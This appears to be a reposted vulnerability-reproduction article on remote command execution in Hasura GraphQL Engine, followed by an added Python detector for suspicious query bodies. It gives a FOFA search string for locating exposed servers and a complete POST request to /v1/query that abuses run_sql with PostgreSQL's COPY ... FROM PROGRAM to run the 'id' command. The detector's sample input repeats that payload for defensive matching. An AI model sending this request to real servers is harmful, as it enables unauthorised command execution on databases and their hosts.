Hasura GraphQL Engine has a remote command execution vulnerability

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to Hasura GraphQL Engine

This article was first published on the Nanfeng Vulnerability Reproduction Library official account

Hasura GraphQL Engine is a very fast GraphQL server open sourced by Hasura.

2. Vulnerability description

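Hasura GraphQL Engine has a remote command execution vulnerability. As the request in section 5 shows, the /v1/query endpoint accepts run_sql operations, and a statement using PostgreSQL's COPY ... FROM PROGRAM runs an operating system command on the database server.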

CVE number:
CNNVD number:
CNVD number:

3. Affected versions

[Picture 1]

4. FOFA query statement

"Hasura GraphQL"

5. Vulnerability reproduction

Vulnerable URL: http://127.0.0.1/v1/query
Request packet:

POST /v1/query HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 352
Content-Type: application/x-www-form-urlencoded

{"type": "bulk", "args": [{"type": "run_sql", "args": {"sql": "SET LOCAL statement_timeout = 10000;", "cascade": false, "read_only": false}}, {"type": "run_sql", "args": {"sql": "DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;", "cascade": false, "read_only": false}}]}

Execute the id command

Execute the ls command

6. POC & EXP

none

7. Remediation recommendations

Watch for the vendor's upgrade or patch that fixes the vulnerability. Patches can be obtained from: https://github.com/hasura/graphql-engine/
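
A defensive check for the request shape shown in section 5, as an added example that is not part of the original article or of Hasura's code: it parses a logged /v1/query body, walks bulk operations, and flags run_sql statements that begin with COPY and use FROM PROGRAM or TO PROGRAM. The function names and the sample bodies are constructed for illustration.

```python
import json
import re

# SQL comments are stripped first so keywords separated by a comment still match.
COMMENTS = re.compile(r"/\*.*?\*/|--[^\n]*", re.DOTALL)
# A statement that starts with COPY and reads from or writes to PROGRAM makes
# the PostgreSQL server run an operating system command.
COPY_PROGRAM = re.compile(r"\s*copy\b.*?\b(?:from|to)\s+program\b",
                          re.IGNORECASE | re.DOTALL)


def iter_run_sql(op):
    """Yield the SQL text of every run_sql operation, descending into bulk."""
    if isinstance(op, list):
        for item in op:
            yield from iter_run_sql(item)
    elif isinstance(op, dict):
        args = op.get("args")
        if op.get("type") == "run_sql" and isinstance(args, dict):
            if isinstance(args.get("sql"), str):
                yield args["sql"]
        elif op.get("type") == "bulk":
            yield from iter_run_sql(args)


def find_program_copy(body):
    """Return the COPY ... PROGRAM statements found in a /v1/query body."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []  # not JSON: nothing to inspect
    hits = []
    for sql in iter_run_sql(doc):
        # Naive split on ';' is enough for flagging; it is not a SQL parser.
        for stmt in COMMENTS.sub(" ", sql).split(";"):
            if COPY_PROGRAM.match(stmt):
                hits.append(" ".join(stmt.split()))
    return hits


# Constructed samples: the first mirrors the body in section 5, the second is benign.
SUSPICIOUS = json.dumps({"type": "bulk", "args": [
    {"type": "run_sql", "args": {"sql": "SET LOCAL statement_timeout = 10000;"}},
    {"type": "run_sql", "args": {"sql": "CREATE TABLE cmd_exec(cmd_output text);\n"
                                        "COPY cmd_exec FROM PROGRAM 'id';"}},
]})
BENIGN = json.dumps({"type": "run_sql", "args": {"sql": "SELECT copy FROM program;"}})

if __name__ == "__main__":
    print(find_program_copy(SUSPICIOUS), find_program_copy(BENIGN))
```
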

Origin blog.csdn.net/nnn2188185/article/details/130895253